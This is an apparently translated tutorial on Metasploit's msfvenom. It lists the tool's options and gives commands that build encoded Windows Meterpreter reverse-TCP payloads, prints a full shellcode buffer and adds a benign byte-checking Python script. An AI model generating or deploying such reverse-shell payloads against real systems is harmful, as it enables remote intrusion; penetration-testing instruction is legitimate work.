• Usage of Msfvenom in Metasploit (reposted translation of a foreign-language article)


    Options:
        -p, --payload    [payload]       Payload to use. Specify a '-' or stdin to use custom payloads
        -l, --list       [module_type]   List a module type example: payloads, encoders, nops, all
        -n, --nopsled    [length]        Prepend a nopsled of [length] size on to the payload
        -f, --format     [format]        Format to output results in: raw, ruby, rb, perl, pl, c, js_be, js_le, java, dll, exe, exe-small, elf, macho, vba, vbs, loop-vbs, asp, war
        -e, --encoder    [encoder]       The encoder to use
        -a, --arch       [architecture]  The architecture to use
            --platform   [platform]
                                         The platform of the payload
        -s, --space      [length]        The maximum size of the resulting payload
        -b, --bad-chars  [list]          The list of characters to avoid example: '\x00\xff'
        -i, --iterations [count]         The number of times to encode the payload
        -x, --template   [path]          Specify a custom executable file to use as a template
        -k, --keep                       Preserve the template behavior and inject the payload as a new thread
        -h, --help                       Show this message
    msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT DE SORTIE> > nomdefichier
    e.g.:
    msfvenom -p windows/meterpreter/reverse_tcp -f raw -e x86/jmp_call_additive LHOST=<NOTRE IP> | msfvenom -e x86/shikata_ga_nai -a x86 --platform windows -f exe > meter.exe


    The Rapid7 site also gives an example of using the script, namely the creation of a payload (reverse_tcp):

    fahrenheit:msf3 bannedit$ msfvenom -p windows/meterpreter/reverse_tcp -f ruby -e -i 3 -s 480 LHOST=192.168.0.120
    [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
    [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
    [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
    buf =
    "\xd9\xf7\xd9\x74\x24\xf4\xbb\x9c\xec\xea\x8a\x5f\x2b\xc9"+
    "\xb1\x50\x31\x5f\x18\x03\x5f\x18\x83\xef\x60\x0e\x1f\x31"+
    "\x11\xe0\xa4\x2a\xfb\x23\xfd\xc7\xdf\x2f\xa4\x16\xd6\x61"+
    "\x10\x68\xb2\x95\x20\x60\xbe\x95\x7c\x65\x55\x40\x38\x01"+
    "\x4b\x51\x78\x5f\x1f\x36\xde\x3b\x99\x8c\xb2\x11\xb3\x8d"+
    "\x2d\x4c\x66\x7c\xbd\x02\x0b\xa6\xa9\x1a\x32\x65\xcf\x75"+
    "\xe8\x15\x1a\x62\x5f\x69\xe1\xdd\x90\x2e\x2e\x40\xe0\xb7"+
    "\x8b\x16\xfe\x15\xdc\x34\x4c\x4e\x18\x18\x03\x46\x22\xff"+
    "\xa8\x9b\xf0\xd5\x4f\xe0\xfd\xab\x71\x6e\x43\x03\xd5\x28"+
    "\x07\x29\x5e\xad\x8f\xd8\xaf\xbd\x69\x06\xf1\xd1\x4e\x9b"+
    "\x01\x7d\x5a\x75\x54\x76\x90\xdb\x5e\x7b\x97\x37\xa4\xab"+
    "\x2d\xe2\x17\x8e\xcf\x4b\xd0\x3f\xef\xc6\xff\xe5\x1c\xc3"+
    "\x99\x04\x15\x2e\xce\x5e\x16\x86\x5a\x2f\x62\x0a\x32\xe5"+
    "\xe1\xa4\xd3\x32\x92\x13\xfd\xcf\xb6\xa2\x8b\x97\xce\xf8"+
    "\x27\x12\xb0\x6f\xb5\xa8\x91\x30\x2c\x14\x40\x2f\x43\xd8"+
    "\x45\x46\xd0\x4c\x58\x59\x8d\x78\x47\xb2\xda\x79\x6c\xfa"+
    "\x07\x43\x18\xc4\x07\x0e\x2f\xd0\x71\x84\xcb\x1c\xab\x01"+
    "\xb0\x17\xed\x07\x1b\xb0\xcf\xd1\x25\xc1\x9b\x62\x7c\xac"+
    "\x43\x2e\x52\x36\xb1\xfc\x61\xbc\x0e\x56\xdc\xe1\x9d\xc2"+
    "\x29\x3f\xe9\xf3\xb1\xe2\x72\x77\x99\x4b\xf3\xfc\x83\xd2"+
    "\x19\x6d\x53\x4c\x64\xa0\xdd\x38\x82\x3d\x15\x66\x38\x96"+
    "\x39\xb3\xa4\xe3\xff\x07\xb7\x8a\x23\xca\xc6\xaf\x57\x64"+
    "\x3d\xf3\x23\x63\x42\x30\x90\x3b\x67\x26\x81\x24\x61\xc3"+
    "\xe4\x51\x75\x30\x47\xf8\x15\xcb\x21\xe9\x2a\x30\x9d\x04"+
    "\x28\xe3\x37\xb0\xa4\xaa\x1e\xf3"

    This creates a payload in Ruby format with the shikata_ga_nai encoder, which was chosen automatically by encoder rank; -s 480 means the output must not exceed 480 bytes, and finally LHOST=192.168.0.120 sets the LHOST variable used by the payload.
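    The -s and -b options are constraints on the bytes msfvenom emits, so a useful way to understand them is to re-check a listing against them. The following Python script is an added example, not code from the original article or from Metasploit: it parses a Ruby-format `buf = "\x.."+...` listing back into raw bytes, then reports the size against an `-s` limit and the offsets of any byte that a `-b` list such as `'\x00\xff'` forbids. The sample listing embedded in it is constructed for the demo (a few arbitrary bytes) and is not the payload printed above.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample in the "buf = ..." layout that msfvenom -f ruby prints.
# The byte values are arbitrary and made up for this demo; they are not the
# payload shown in the article.
SAMPLE_RUBY_OUTPUT = r'''buf =
"\xd9\xf7\xd9\x74\x24\xf4"+
"\x00\x41\xff\x90"
'''

# One escaped byte such as \x1f: the notation used by the ruby, perl and c
# output formats and by the -b bad-character list.
HEX_BYTE = re.compile(r"\\x([0-9a-fA-F]{2})")


def parse_escaped_bytes(text: str) -> bytes:
    r"""Collect every \xNN escape in text, in order, into a bytes object."""
    return bytes(int(pair, 16) for pair in HEX_BYTE.findall(text))


@dataclass
class PayloadReport:
    size: int                        # length of the decoded payload in bytes
    max_size: Optional[int]          # the -s limit, or None when none was requested
    bad_char_offsets: Dict[int, List[int]] = field(default_factory=dict)  # byte value -> offsets

    @property
    def fits(self) -> bool:
        """True when the payload respects the -s limit (or no limit was given)."""
        return self.max_size is None or self.size <= self.max_size

    @property
    def clean(self) -> bool:
        """True when none of the forbidden byte values occurs in the payload."""
        return not self.bad_char_offsets


def check_payload(ruby_output: str, max_size: Optional[int] = None,
                  bad_chars: str = "") -> PayloadReport:
    r"""Re-check a Ruby-format listing against an -s limit and a -b list like '\x00\xff'."""
    payload = parse_escaped_bytes(ruby_output)
    forbidden = set(parse_escaped_bytes(bad_chars))   # -b uses the same \xNN syntax
    offsets: Dict[int, List[int]] = {}
    for index, value in enumerate(payload):
        if value in forbidden:
            offsets.setdefault(value, []).append(index)
    return PayloadReport(size=len(payload), max_size=max_size, bad_char_offsets=offsets)


if __name__ == "__main__":
    # The -s value from the article's example (480) and the -b list from the help text.
    report = check_payload(SAMPLE_RUBY_OUTPUT, max_size=480, bad_chars=r"\x00\xff")
    print(f"size={report.size} fits={report.fits} clean={report.clean} "
          f"bad={report.bad_char_offsets}")
```

    Run against the real listing above, the script confirms the size that msfvenom reported and shows exactly where a forbidden byte would have to be removed by re-encoding; the same parser accepts the perl and c formats because they use the identical `\xNN` escapes.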

    A comparison of execution speed is also given.
    The first example shows the run time of Msfvenom, while the second shows that of msfpayload and msfencode together:

    fahrenheit:msf3 bannedit$ time ./msfvenom -p windows/meterpreter/reverse_tcp -e -i 3 LHOST=192.168.0.120 -f ruby 1> /dev/null
    [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
    [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
    [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
    real    0m2.744s
    user    0m2.380s
    sys    0m0.367s
    fahrenheit:msf3 bannedit$ time ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.120 R|./msfencode -c 3 1> /dev/null
    [*] x86/shikata_ga_nai succeeded with size 321 (iteration=1)
    [*] x86/shikata_ga_nai succeeded with size 348 (iteration=2)
    [*] x86/shikata_ga_nai succeeded with size 375 (iteration=3)
    real    0m3.070s
    user    0m4.227s
    sys    0m0.778s

  • Original article: https://www.cnblogs.com/demonspider/p/2738707.html